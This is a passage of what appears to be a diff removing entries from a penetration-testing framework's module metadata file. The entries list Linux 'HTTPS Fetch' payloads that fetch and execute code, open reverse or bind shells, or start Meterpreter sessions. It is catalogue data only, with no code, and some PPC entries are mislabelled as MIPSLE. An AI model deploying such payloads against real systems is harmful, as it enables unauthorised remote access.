"/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/shell", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/https/mipsbe/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/mipsbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/mipsbe/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [ - "EDB-18226" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsle/exec": { - "name": "HTTPS Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/https/mipsle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/exec", - "staged": false - }, - "payload_cmd/linux/https/mipsle/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/mipsle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/meterpreter", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/https/mipsle/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/mipsle/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/mipsle/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsle/reboot": { - "name": "HTTPS Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/https/mipsle/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/reboot", - "staged": false - }, - "payload_cmd/linux/https/mipsle/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/mipsle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/shell", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/https/mipsle/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/mipsle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsle/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/mipsle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsle", - "adapted_refname": "linux/mipsle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/ppc/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/ppc/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/ppc/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/ppc64/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/ppc64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:15 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64", - "adapted_refname": "linux/ppc64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/ppc64/shell_find_port": { - "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/https/ppc64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:15 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64", - "adapted_refname": "linux/ppc64/shell_find_port", - "staged": false - }, - "payload_cmd/linux/https/ppc64/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/ppc64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:15 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64", - "adapted_refname": "linux/ppc64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/ppc64le/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/ppc64le/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/ppc64le/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/exec": { - "name": "HTTPS Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/https/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/exec", - "staged": false - }, - "payload_cmd/linux/https/x64/meterpreter/bind_tcp": { - "name": "HTTPS Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/https/x64/meterpreter/reverse_sctp": { - "name": "HTTPS Fetch, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/https/x64/meterpreter/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/https/x64/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/https/x64/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/x64/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/x64/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/pingback_bind_tcp": { - "name": "HTTPS Fetch, Linux x64 Pingback, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/x64/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nAccept a connection from attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/pingback_reverse_tcp": { - "name": "HTTPS Fetch, Linux x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/pingback_reverse_tcp", - 